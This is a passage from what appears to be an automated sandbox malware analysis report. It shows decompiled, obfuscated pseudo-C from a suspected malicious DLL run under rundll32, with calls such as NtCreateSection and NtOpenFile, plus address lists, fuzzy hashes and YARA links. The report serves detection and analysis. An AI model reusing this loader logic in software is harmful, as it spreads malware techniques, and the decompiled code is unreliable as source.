				 *((intOrPtr*)(_t145 + 0x48 + __r9 * 2)) =  *((intOrPtr*)(_t145 + 0x48 + __r9 * 2)) + _t108;
				if (__eflags < 0) goto 0x535fb618;
				r9d = 0x1ec0;
				 *((long long*)(_t195 - 0x30)) = __r8 + __r9;
				r8d = 0x181f;
				 *((long long*)(_t195 - 0x38)) =  *((intOrPtr*)(_t145 +  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x148) * 8 - 0x9820));
				E00007FFA7FFA535E1000( *((intOrPtr*)(_t145 +  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x148) * 8 - 0x9820)), __rcx, __rsi, _t199, _t196); // executed
				_t179 = _a56;
				 *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x410) =  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x410) * 0xc92ffa;
				_t124 =  *((intOrPtr*)(_t145 + 0x110));
				 *( *((intOrPtr*)(_t145 + 0x358)) + 0x3a0) =  *( *((intOrPtr*)(_t145 + 0x358)) + 0x3a0) |  *(_t124 + 0x398) ^ 0x0000157a;
				if (_t179 !=  *((intOrPtr*)(_t145 + 0x2f0))) goto 0x535fb6a1;
				GetCurrentThreadId();
				 *((long long*)(_t145 + 0x200)) = _t124;
				if (_t124 == 0) goto 0x535fb6a1;
				 *((char*)(_t145 + 0x408)) = 1;
				_v40 = _t179;
				 *( *((intOrPtr*)(_t145 + 0x20)) + 0x298) =  *( *((intOrPtr*)(_t145 + 0x20)) + 0x298) ^  *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0);
				 *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0) =  *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0) - 1;
				_v48 = _a48;
				_v56 = _a40;
				NtCreateSection(_t175, ??, ??, ??, ??, ??);
				if ( *((char*)(_t145 + 0x408)) == 0) goto 0x535fb732;
				 *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x3c8) =  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x3c8) ^ ( *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x3b8) | 0x00001ec0);
				 *((long long*)(_t145 + 0x308)) =  *_t176;
				goto 0x535fb7cb;
				_t172 =  *(_t145 + 0x108);
				r9d = 0x1b47;
				_t156 =  *((intOrPtr*)(_t145 + 0x2a0)) + 0x108;
				r8d = _t183 + 0x60;
				_t130 =  *(_t172 + 0x5e0) * _t156;
				 *(_t172 + 0x5e0) = _t130;
				_t131 = _t130 +  *_t130;
				 *((intOrPtr*)(_t131 - 0x75)) =  *((intOrPtr*)(_t131 - 0x75)) + _t108;
				 *((long long*)(_t131 + 0x90)) = _t156 - 0x16ce;
				_t78 = _t145 + 0x258; // 0x2151e49e148
				_v40 = _t78 + ( *( *((intOrPtr*)(_t145 + 0x20)) + 0x340) ^ 0x000011f0) * 0xd;
				_v48 =  *((intOrPtr*)(_t145 + 0x280 + ( *( *((intOrPtr*)(_t145 + 0x358)) + 0x340) ^ 0x000011f0) * 8));
				_t107 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t145 + 0x280 + ( *( *((intOrPtr*)(_t145 + 0x358)) + 0x340) ^ 0x000011f0) * 8)), _t145, _a40);
				 *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x5e8)) + 0x40)) =  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x5e8)) + 0x40)) - ( *(_t145 + 0x108) | 0x00000651);
				 *( *((intOrPtr*)(_t145 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t145 + 0x160)) + 0x128) ^  *( *((intOrPtr*)(_t145 + 0x240)) + 0x108) * 0x000016ce;
				 *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x248) =  *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x248) |  *((intOrPtr*)(_t145 + 0x160)) + 0x00000170;
				return _t107;
			}
























                0x7ffa535fb5b0
                0x7ffa535fb5b3
                0x7ffa535fb5b7
                0x7ffa535fb5bb
                0x7ffa535fb5c8
                0x7ffa535fb5d2
                0x7ffa535fb5d5
                0x7ffa535fb5d8
                0x7ffa535fb5e4
                0x7ffa535fb5e7
                0x7ffa535fb5e9
                0x7ffa535fb5f0
                0x7ffa535fb5f3
                0x7ffa535fb5fa
                0x7ffa535fb601
                0x7ffa535fb605
                0x7ffa535fb609
                0x7ffa535fb615
                0x7ffa535fb61b
                0x7ffa535fb61f
                0x7ffa535fb634
                0x7ffa535fb638
                0x7ffa535fb644
                0x7ffa535fb657
                0x7ffa535fb65e
                0x7ffa535fb67a
                0x7ffa535fb688
                0x7ffa535fb68a
                0x7ffa535fb690
                0x7ffa535fb698
                0x7ffa535fb69a
                0x7ffa535fb6b2
                0x7ffa535fb6be
                0x7ffa535fb6d2
                0x7ffa535fb6e0
                0x7ffa535fb6eb
                0x7ffa535fb6ef
                0x7ffa535fb6fe
                0x7ffa535fb71c
                0x7ffa535fb726
                0x7ffa535fb72d
                0x7ffa535fb732
                0x7ffa535fb739
                0x7ffa535fb746
                0x7ffa535fb754
                0x7ffa535fb758
                0x7ffa535fb75c
                0x7ffa535fb76c
                0x7ffa535fb76e
                0x7ffa535fb77a
                0x7ffa535fb793
                0x7ffa535fb7a4
                0x7ffa535fb7c1
                0x7ffa535fb7c6
                0x7ffa535fb7e4
                0x7ffa535fb801
                0x7ffa535fb821
                0x7ffa535fb838

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$CreateCurrentSectionThread
                • String ID:
                • API String ID: 1345506602-0
                • Opcode ID: cce895ea8ed1431f6779cb85fa0147dc2f3519a9c2047c01d5325abb22bfc599
                • Instruction ID: a767095fbec2c711508090b3bb68a2210375bc3758edbd2e04cea852539b85af
                • Opcode Fuzzy Hash: cce895ea8ed1431f6779cb85fa0147dc2f3519a9c2047c01d5325abb22bfc599
                • Instruction Fuzzy Hash: A6511276614B8486DB44CF2AD8843AA37A9F388F88F188136DF8D9B768DF34C1918750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535FB25C Relevance: 3.1, APIs: 2, Instructions: 83filenativethreadCOMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E00007FFA7FFA535FB25C(void* __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, long long _a40, long long _a48) {
				long long _v32;
				long long _v40;
				char _t51;
				void* _t54;
				void* _t55;
				void* _t64;
				long long _t65;
				intOrPtr* _t67;
				long long _t70;
				intOrPtr _t79;
				intOrPtr* _t92;
				void* _t95;
				long long _t98;
				void* _t100;
				HANDLE* _t108;
				void* _t111;
				void* _t114;

				_t64 = _t100;
				 *((long long*)(_t64 + 8)) = __rbx;
				 *((long long*)(_t64 + 0x10)) = __rbp;
				 *((long long*)(_t64 + 0x18)) = __rsi;
				 *((long long*)(_t64 + 0x20)) = __rdi;
				_t79 =  *0x5367c000; // 0x2151e49def0
				_t98 = _a48;
				_t95 = __r8;
				r15d = __edx;
				_t92 = __rcx;
				 *((char*)(_t79 + 0x408)) = 0;
				_t65 =  *((intOrPtr*)(_t79 + 0x2a0));
				if ((bpl & 0x00000040) == 0) goto 0x535fb2ef;
				GetCurrentThreadId();
				 *((long long*)(_t79 + 0x200)) = _t65;
				if (_t65 == 0) goto 0x535fb2ef;
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x10)) - 0x77)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x10)) - 0x77)) + _t55;
				asm("ror dword [eax-0x77], 0x5c");
				r9d = 0xbbbb90000157a;
				_t51 = E00007FFA7FFA535E2C34(__edx,  *((long long*)( *((intOrPtr*)(__r8 + 0x10)) + 0x44000001)) - 0xffffff8b, _t79, 0x1515, __rcx, __r8, _t98, __r8,  *((intOrPtr*)(_t65 + 0x148)));
				 *((char*)(_t79 + 0x408)) = _t51;
				_t67 =  *((intOrPtr*)(_t79 + 0x240));
				_t22 = _t79 + 0x204; // 0x2151e49e0f4
				_v32 = _t22;
				 *_t67 =  *_t67 + _t51;
				r8d = 0x181f;
				_v40 =  *((intOrPtr*)(_t79 +  *(_t67 + 0x2a8) * 8 - 0x10620));
				E00007FFA7FFA535E1000( *((intOrPtr*)(_t79 +  *(_t67 + 0x2a8) * 8 - 0x10620)), _t79, __r8, _t114, _t111); // executed
				_t70 = _a40;
				_v32 = _t98;
				_v40 = _t70;
				NtOpenFile(_t108, ??, ??, ??, ??); // executed
				 *((long long*)(_t79 + 0x404)) = _t70;
				if ( *((char*)(_t79 + 0x408)) == 0) goto 0x535fb365;
				 *((long long*)(_t79 + 0x2f0)) =  *_t92;
				goto 0x535fb3a5;
				r9d = 0x157a;
				_t37 = _t79 - 0x19bba; // 0x2151e484336
				_v32 = _t37 +  *( *((intOrPtr*)(_t79 + 0x160)) + 0x1b0) * 0xd;
				_v40 =  *((intOrPtr*)(_t79 + 0x280));
				_t54 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t79 + 0x280)), _t79, _t95); // executed
				 *((long long*)( *((intOrPtr*)(_t79 + 0x358)) + 0x130)) =  *((long long*)( *((intOrPtr*)(_t79 + 0x358)) + 0x130)) + 0xffffdeec;
				return _t54;
			}




















                0x7ffa535fb25c
                0x7ffa535fb25f
                0x7ffa535fb263
                0x7ffa535fb267
                0x7ffa535fb26b
                0x7ffa535fb279
                0x7ffa535fb283
                0x7ffa535fb287
                0x7ffa535fb28a
                0x7ffa535fb28d
                0x7ffa535fb290
                0x7ffa535fb297
                0x7ffa535fb2b1
                0x7ffa535fb2b3
                0x7ffa535fb2b9
                0x7ffa535fb2c1
                0x7ffa535fb2d0
                0x7ffa535fb2da
                0x7ffa535fb2e0
                0x7ffa535fb2e4
                0x7ffa535fb2e9
                0x7ffa535fb2ef
                0x7ffa535fb2f6
                0x7ffa535fb2fd
                0x7ffa535fb30b
                0x7ffa535fb30d
                0x7ffa535fb325
                0x7ffa535fb32a
                0x7ffa535fb32f
                0x7ffa535fb339
                0x7ffa535fb340
                0x7ffa535fb347
                0x7ffa535fb351
                0x7ffa535fb357
                0x7ffa535fb35c
                0x7ffa535fb363
                0x7ffa535fb36c
                0x7ffa535fb382
                0x7ffa535fb38f
                0x7ffa535fb39b
                0x7ffa535fb3a0
                0x7ffa535fb3bb
                0x7ffa535fb3db

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFileOpenThread
                • String ID:
                • API String ID: 2680504152-0
                • Opcode ID: 4fa0dbaa573a6abbb2b3fd4ab1287ece3485c117b37b632e354cfde2e32bce3e
                • Instruction ID: 607b1d3a926ce3a5dafa3b892edf20275d0b09b2e5c5be049f533fdde1a5e682
                • Opcode Fuzzy Hash: 4fa0dbaa573a6abbb2b3fd4ab1287ece3485c117b37b632e354cfde2e32bce3e
                • Instruction Fuzzy Hash: A9419E72618B8586E710CF26E4806AD77A5F789F98F084135DF8C5BBA9CF38D141CB14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F84F0 Relevance: 2.8, APIs: 2, Instructions: 330COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 89%
                			E00007FFA7FFA535F84F0(void* __edi, void* __esp, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __rdi;
				signed int _t213;
				signed int _t218;
				void* _t221;
				signed int _t223;
				void* _t236;
				signed int _t237;
				signed int _t239;
				long long _t242;
				intOrPtr* _t264;
				void* _t293;
				signed int _t314;
				signed long long _t373;
				signed long long _t381;
				signed long long _t385;
				signed long long _t388;
				long long _t397;
				void* _t398;
				void* _t400;
				void* _t401;
				signed long long _t414;
				struct _CRITICAL_SECTION* _t425;
				long long* _t426;
				signed long long _t428;
				struct _CRITICAL_SECTION* _t430;
				void* _t432;
				signed long long _t433;
				void* _t435;
				intOrPtr* _t436;

				_t236 = _t400;
				 *((long long*)(_t236 + 8)) = __rbx;
				 *((long long*)(_t236 + 0x10)) = _t397;
				 *((long long*)(_t236 + 0x18)) = __rsi;
				 *(_t236 + 0x20) = r9d;
				_t401 = _t400 - 0x70;
				_t237 =  *(_t401 + 0xf0);
				_t314 =  *(_t401 + 0xd8);
				r9d = r9d + 0x6c3;
				_t398 = __r8;
				r10d =  *(_t401 + 0xc0);
				 *((long long*)(_t401 + 0xe8)) =  *((long long*)(_t401 + 0xe8)) + 0xfffff9e0;
				r12d = _t237 - 0x1ad7;
				 *(_t401 + 0x50) = r12d;
				 *((long long*)(_t401 + 0x58)) = _t237 + 0xfffff71a;
				r8d =  *(_t401 + 0xd0) + 0x4f3;
				_t239 =  *(_t401 + 0xe0);
				r15d = _t314 - 0x1ec0;
				r10d = r10d + 0xffffeaeb;
				 *(_t401 + 0x54) = r9d;
				 *(_t401 + 0xf0) = r8d;
				r13d = _t314 - 0xc13;
				 *(_t401 + 0xd8) = r10d;
				r14d = _t239 + 0x9c9;
				 *(_t401 + 0xd0) = r14d;
				 *(_t401 + 0xc0) = _t239 + 0xfffff9e5;
				if ( *((intOrPtr*)(_t401 + 0xc8)) - r9d <= 0) goto 0x535f8bdb;
				if (r14d - _t221 <= 0) goto 0x535f8bdb;
				if (r8d - _t430 + 0x89a > 0) goto 0x535f88c3;
				_t242 =  *((intOrPtr*)(__r8 + 0x468));
				 *((long long*)(_t242 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) + 0x610e;
				 *((intOrPtr*)(__r8 + 0x3e0))();
				 *((long long*)(__r8 + 0x3d8)) = _t242;
				r13d = 0x1352;
				 *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) =  *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) * ((M00007FFA7FFA5366FD45 & 0x000000ff) + 0x181f);
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - ( *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x230) ^ 0x00001320);
				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x90)) + 0xbbb;
				if ( *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) == _t430) goto 0x535f8881;
				_t48 = _t398 + 0x280; // 0x15d2
				_t436 = _t48;
				_t49 = _t398 + 0x25a; // 0x15ac
				_t426 = _t49;
				r8d = _t223;
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) + 0x1b47 -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x190));
				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) |  *( *((intOrPtr*)(__r8 + 0x358)) + 0x358) ^ 0x00001582;
				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) |  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x318)) - 0x0000181f;
				 *(_t426 - 2) = _t218;
				 *(( *(__r8 + 0x1b0) ^ 0x00001fd3) + 0xfffffda6 + _t426 + __r8 + 0x258) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482;
				 *_t426 =  *((intOrPtr*)(_t436 + 0x30));
				 *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) =  *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) * 0x15fd;
				_t76 = _t398 + 0x204; // 0x1556
				E00007FFA7FFA535E3B00(_t218, __edi, _t223, __esp, _t76 + __rbx,  *_t436, 0xfffffda6 - __r8, 0,  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x148) ^ 0x00001358);
				r9d = 0x16ce;
				r8d = 0x10ae;
				 *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) =  *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) ^  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140);
				 *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) - 1;
				_t264 =  *((intOrPtr*)(__r8 + 0x108));
				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) -  *((intOrPtr*)(_t264 + 0x178));
				 *_t264 =  *_t264 + _t264;
				 *((intOrPtr*)(_t264 - 0x75)) =  *((intOrPtr*)(_t264 - 0x75)) + _t218;
				asm("int 0x48");
				 *((long long*)(_t264 + 0x178)) =  *((long long*)(_t264 + 0x178)) + 1;
				_t96 = _t398 + 0x258; // 0x15aa
				 *(_t401 + 0x28) = _t96 + __rbx;
				 *(_t401 + 0x20) =  *_t436;
				E00007FFA7FFA535E1000( *_t436,  *((intOrPtr*)(_t264 + 0x178)), 0, _t435, _t432); // executed
				 *( *((intOrPtr*)(_t398 + 0x160)) + 0x3a0) =  *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x190) ^ 0x000012ad;
				 *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x360) =  *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x360) ^  *(_t398 + 0x298) + 0x00002114;
				if (_t223 -  *((intOrPtr*)( *(_t398 + 0x358) + 0x148)) - _t430 < 0) goto 0x535f86b0;
				 *((long long*)( *((intOrPtr*)(_t398 + 0x468)))) =  *((intOrPtr*)( *((intOrPtr*)(_t398 + 0x110)) + 0x70)) + 0x70694fe0;
				r14d = r14d - 0x19f;
				 *((long long*)( *((intOrPtr*)(_t398 + 0x468)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t398 + 0x5e8)) + 0x148)) + 0x2e736217;
				goto 0x535f8bdb;
				_t213 = r15d | r12d;
				if (r12d - _t213 < 0) goto 0x535f8b74;
				_t385 =  *((intOrPtr*)(_t398 + 0x488));
				_t373 =  *(_t398 + 0x450) & _t385 | 0x0000145c;
				if ( *((intOrPtr*)(_t398 + 0x240)) != _t373) goto 0x535f89ad;
				 *((long long*)(_t401 + 0x60)) =  *((intOrPtr*)(_t398 + 0x110)) +  *((intOrPtr*)(_t398 + 0x5e0));
				 *((long long*)(_t401 + 0x68)) = (r10d |  *(_t398 + 0x1b0)) + 0xffffdeec;
				_t433 =  *((intOrPtr*)(_t401 + 0x68));
				_t428 =  *((intOrPtr*)(_t401 + 0x60));
				r8d = r8d + 2;
				r15d = r15d - (_t218 & r15d);
				if (r8d == _t373) goto 0x535f8964;
				r14d =  *(_t401 + 0xd0);
				r12d =  *(_t401 + 0x50);
				 *(_t398 + 0x358) =  *(_t398 + 0x358) ^ _t428;
				 *(_t398 + 0x5d8) =  *(_t398 + 0x5d8) * _t433;
				 *(_t398 + 0x1a8) =  *(_t398 + 0x1a8) + (r13d | r12d);
				 *(_t398 + 0x398) =  *(_t398 + 0x248) * 0x1320;
				r10d = r14d;
				r11d =  *(_t398 + 0x2a0);
				r13d = r13d | _t213;
				r9d =  *(_t398 + 0x3a0);
				r11d = r11d | _t213;
				r10d = r10d &  *(_t401 + 0xd8);
				r9d = r9d - 0x157a;
				r9d = r9d |  *(_t398 + 0x68);
				 *(_t398 + 0x350) =  *(_t398 + 0x350) ^ (_t385 -  *((intOrPtr*)(_t398 + 0x2a8)) |  *(_t401 + 0xf0));
				 *(_t401 + 0x28) = r11d;
				 *(_t401 + 0x20) = r10d;
				EnterCriticalSection(_t430);
				r10d = _t433 + _t428;
				r11d =  *(_t398 + 0x70);
				r11d = r11d +  *(_t398 + 0x358);
				r8d =  *(_t398 + 0x2c8);
				r9d =  *(_t401 + 0xe0);
				r8d = r8d + 0x1320;
				r10d = r10d |  *(_t398 + 0x140);
				r9d = r9d + 0x421;
				 *(_t401 + 0x40) = r8d;
				_t388 = r9d;
				r8d = 0;
				 *(_t401 + 0x38) = r10d;
				r11d = r11d * r12d;
				 *(_t398 + 0x108) =  *(_t398 + 0x108) | r12d ^ 0x00001515;
				 *(_t398 + 0x1a8) = _t388 -  *((intOrPtr*)(_t398 + 0x5e8));
				 *(_t401 + 0x30) = r11d;
				_t293 =  *(_t401 + 0xd8) +  *((intOrPtr*)(_t398 + 0x3b8)) -  *(_t401 + 0xc0);
				r9d = r9d + _t213;
				 *(_t401 + 0x28) =  *(_t398 + 0x3c8) ^  *(_t398 + 0x298) | 0x00001ba7;
				 *(_t401 + 0x20) = r9d;
				E00007FFA7FFA535F6E94(_t293,  *(_t398 + 0x3c8) ^  *(_t398 + 0x298) | 0x00001ba7,  *(_t401 + 0x54) & 0x0000181f,  *((intOrPtr*)(_t398 + 0x1d0)) +  *(_t401 + 0xf0) ^  *(_t401 + 0xb8), _t218 & r15d, _t398,  *(_t398 + 0x5d8) * _t433);
				 *(_t398 + 0xb0) =  *(_t398 + 0xb0) + _t293;
				 *(_t398 + 0x3d0) =  *(_t398 + 0x3d0) ^  *(_t398 + 0x358) - 0x00001ba7;
				r13d = r13d - _t293;
				 *(_t398 + 0x108) =  *(_t398 + 0x108) ^ ( *(_t398 + 0x420) &  *(_t398 + 0x230)) * _t388;
				 *((intOrPtr*)(_t398 + 0x80)) =  *((intOrPtr*)(_t398 + 0x80)) - (r13d |  *(_t398 + 0x3d0));
				r15d = r15d -  *((intOrPtr*)(_t401 + 0xe8));
				LeaveCriticalSection(_t425);
				_t414 =  *((intOrPtr*)(_t401 + 0x58));
				_t381 =  *(_t398 + 0x5d0) | _t414;
				if ( *(_t398 + 0x3a0) - _t381 > 0) goto 0x535f8bdb;
				r8d = r8d + 3;
				if (r8d - _t381 <= 0) goto 0x535f8bae;
				 *(_t398 + 0x1a8) =  *(_t398 + 0x1a8) ^ ( *(_t398 + 0x3d0) ^ _t414) +  *((intOrPtr*)(_t398 + 0x390));
				 *(_t398 + 0x330) =  *(_t398 + 0x330) |  *(_t398 + 0xb0) | 0x0000145c;
				return _t433 - 0x67b;
			}
































                0x7ffa535f84f0
                0x7ffa535f84f3
                0x7ffa535f84f7
                0x7ffa535f84fb
                0x7ffa535f84ff
                0x7ffa535f850c
                0x7ffa535f8510
                0x7ffa535f851a
                0x7ffa535f8521
                0x7ffa535f852f
                0x7ffa535f8532
                0x7ffa535f853a
                0x7ffa535f8545
                0x7ffa535f8551
                0x7ffa535f8556
                0x7ffa535f855a
                0x7ffa535f8561
                0x7ffa535f8568
                0x7ffa535f856f
                0x7ffa535f8576
                0x7ffa535f857b
                0x7ffa535f8583
                0x7ffa535f858a
                0x7ffa535f8592
                0x7ffa535f859e
                0x7ffa535f85a6
                0x7ffa535f85b5
                0x7ffa535f85be
                0x7ffa535f85ce
                0x7ffa535f85e8
                0x7ffa535f85f5
                0x7ffa535f85ff
                0x7ffa535f860e
                0x7ffa535f8623
                0x7ffa535f8634
                0x7ffa535f8657
                0x7ffa535f867a
                0x7ffa535f868f
                0x7ffa535f869c
                0x7ffa535f869c
                0x7ffa535f86a6
                0x7ffa535f86a6
                0x7ffa535f86ad
                0x7ffa535f86c7
                0x7ffa535f86ea
                0x7ffa535f870a
                0x7ffa535f8724
                0x7ffa535f874c
                0x7ffa535f8757
                0x7ffa535f876a
                0x7ffa535f8771
                0x7ffa535f8793
                0x7ffa535f879f
                0x7ffa535f87ac
                0x7ffa535f87b9
                0x7ffa535f87c7
                0x7ffa535f87ce
                0x7ffa535f87e3
                0x7ffa535f87f3
                0x7ffa535f87f5
                0x7ffa535f87f8
                0x7ffa535f87fa
                0x7ffa535f8800
                0x7ffa535f880a
                0x7ffa535f8812
                0x7ffa535f8817
                0x7ffa535f8845
                0x7ffa535f8860
                0x7ffa535f887b
                0x7ffa535f8898
                0x7ffa535f88b4
                0x7ffa535f88bb
                0x7ffa535f88be
                0x7ffa535f88c6
                0x7ffa535f88cc
                0x7ffa535f88d2
                0x7ffa535f88ea
                0x7ffa535f88f4
                0x7ffa535f892d
                0x7ffa535f8949
                0x7ffa535f894e
                0x7ffa535f8956
                0x7ffa535f8964
                0x7ffa535f8975
                0x7ffa535f897b
                0x7ffa535f897d
                0x7ffa535f8985
                0x7ffa535f8991
                0x7ffa535f8998
                0x7ffa535f899f
                0x7ffa535f89a6
                0x7ffa535f89b4
                0x7ffa535f89d1
                0x7ffa535f89d8
                0x7ffa535f89e6
                0x7ffa535f8a02
                0x7ffa535f8a05
                0x7ffa535f8a0d
                0x7ffa535f8a14
                0x7ffa535f8a1e
                0x7ffa535f8a28
                0x7ffa535f8a2d
                0x7ffa535f8a4b
                0x7ffa535f8a57
                0x7ffa535f8a5b
                0x7ffa535f8a66
                0x7ffa535f8a6f
                0x7ffa535f8a76
                0x7ffa535f8a7e
                0x7ffa535f8a85
                0x7ffa535f8a8c
                0x7ffa535f8a97
                0x7ffa535f8aa2
                0x7ffa535f8aa5
                0x7ffa535f8ab4
                0x7ffa535f8abf
                0x7ffa535f8acc
                0x7ffa535f8add
                0x7ffa535f8aeb
                0x7ffa535f8af0
                0x7ffa535f8af2
                0x7ffa535f8af5
                0x7ffa535f8af9
                0x7ffa535f8b01
                0x7ffa535f8b16
                0x7ffa535f8b2a
                0x7ffa535f8b36
                0x7ffa535f8b4b
                0x7ffa535f8b5c
                0x7ffa535f8b63
                0x7ffa535f8b6e
                0x7ffa535f8b74
                0x7ffa535f8b87
                0x7ffa535f8b8d
                0x7ffa535f8bb5
                0x7ffa535f8bcb
                0x7ffa535f8bcd
                0x7ffa535f8bd4
                0x7ffa535f8bff

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterLeave
                • String ID:
                • API String ID: 130458602-0
                • Opcode ID: b6afa930ee8906a2232bb450f73c58f4f08114434751a5a7ffdf20fe04c22972
                • Instruction ID: 02d6a5a93a868638aef57833eff24a1c7189564729fb9462f7a3ca9041d7cce2
                • Opcode Fuzzy Hash: b6afa930ee8906a2232bb450f73c58f4f08114434751a5a7ffdf20fe04c22972
                • Instruction Fuzzy Hash: 74022272614BC48ADB74CF25D8847EA77A9F788B88F054126DB8D5BB58DF38D690CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F6898 Relevance: 2.8, APIs: 2, Instructions: 290COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 82%
                			E00007FFA7FFA535F6898(void* __rcx, signed long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* _t159;
				signed int _t163;
				signed int _t169;
				signed int _t171;
				signed int _t175;
				signed int _t177;
				signed long long _t196;
				signed int _t197;
				signed int _t202;
				long long _t210;
				long long _t239;
				signed long long _t250;
				signed long long _t263;
				signed int _t295;
				signed long long _t315;
				void* _t318;
				void* _t324;
				signed int _t325;
				signed int _t326;
				void* _t327;
				signed long long _t331;
				void* _t339;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;

				_t304 = __rdx;
